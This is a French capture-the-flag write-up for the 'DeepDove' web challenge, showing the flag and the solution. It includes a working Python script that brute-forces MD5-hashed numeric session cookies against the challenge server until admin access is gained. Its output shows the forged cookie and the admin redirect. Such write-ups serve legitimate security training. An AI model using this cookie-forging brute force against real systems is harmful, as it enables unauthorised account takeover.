DeepDove

Flag: ECW{g0t_7hE_c0oK1e_D0uGh}

Challenge

Description


Listen carefully to what you hear. Choose your identity and retrieve the flag in this never before seen challenge !

Challenge made by:

Solution

En cliquant sur le bouton Intercept, une requête POST est faite sur /index.php. La réponse nous donne le cookie MyHashedSessionId et nous redirige sur /home.php.

Ensuite, /home.php nous redirige vers /guest.php.

Si l'on cherche un peu la valeur de notre cookie sur internet, on voit qu'il s'agit du md5 d'un nombre (ici 510).


Exploitation

On va donc bruteforce le cookie et faire une requête sur /home.php jusqu'à ce que la redirection ne soit plus /guest.php.

import requests
from hashlib import md5

HOST = "challenges.challenge-ecw.eu"
PORT = 34964
URL = f"http://{HOST}:{PORT}"

for n in range(1000):
  session = md5(str(n).encode()).hexdigest()
  cookies = { 'MyHashedSessionId': session}
  response = requests.get(f'{URL}/home.php', cookies=cookies, allow_redirects=False)
  location = response.headers['Location']
  if location != 'guest.php':
    response = requests.get(f'{URL}/home.php', cookies=cookies, allow_redirects=True)
    print(f'FOUND: {n}')
    print(f'REDIRECT TO: {location}')
    print(f'COOKIE: {session}')
    break
FOUND: 667
REDIRECT TO: admin.php
COOKIE: b5dc4e5d9b495d0196f61d45b26ef33e

Maintenant, on peut se rendre sur le site avec ce cookie et le flag est dans l'onglet recipe :

Mis à jour

Ce contenu vous a-t-il été utile ?